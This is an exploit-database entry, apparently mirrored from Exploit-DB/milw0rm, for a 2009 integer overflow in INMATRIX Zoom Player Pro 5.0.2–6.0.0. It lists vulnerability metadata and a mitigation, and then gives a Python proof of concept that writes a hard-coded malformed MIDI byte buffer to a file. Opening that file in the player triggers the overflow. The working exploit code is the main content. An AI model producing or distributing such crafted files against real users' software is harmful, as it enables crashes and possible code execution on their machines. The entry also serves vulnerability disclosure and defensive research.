INMATRIX Zoom Player Pro - exploit.company

vendor:

Zoom Player Pro

by:

Dr_IDE

7.5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: Zoom Player Pro

Affected Version From: 5.0.2

Affected Version To: 6.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:inmatrix:zoom_player_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC

This PoC exploits an integer overflow vulnerability in INMATRIX Zoom Player Pro versions 5.0.2 and 6.0.0 on Windows XP SP3. The vulnerability is triggered when a specially crafted MIDI file is opened, which causes a buffer overflow. The MIDI structure must be accurate for the exploit to work.

Mitigation:

Update to the latest version of INMATRIX Zoom Player Pro.

Source

Exploit-DB raw data:

#!/usr/bin/env python

##################################################################
#
# INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC 
# Found By:	Dr_IDE
# Credits:	Platen
# Tested:	verified on v 5.0.2 and 6.0.0 on XP SP3
# Download:	http://www.inmatrix.com
#
##################################################################

# MIDI Structure must be accurate
# 
buff = (
"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54"
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61"
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d"
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60"
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6"
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40"
"\x00\xff\x2f\x00");                                                    

f1 = open("midi.mid","w");
f1.write(buff);
f1.close();

# milw0rm.com [2009-09-10]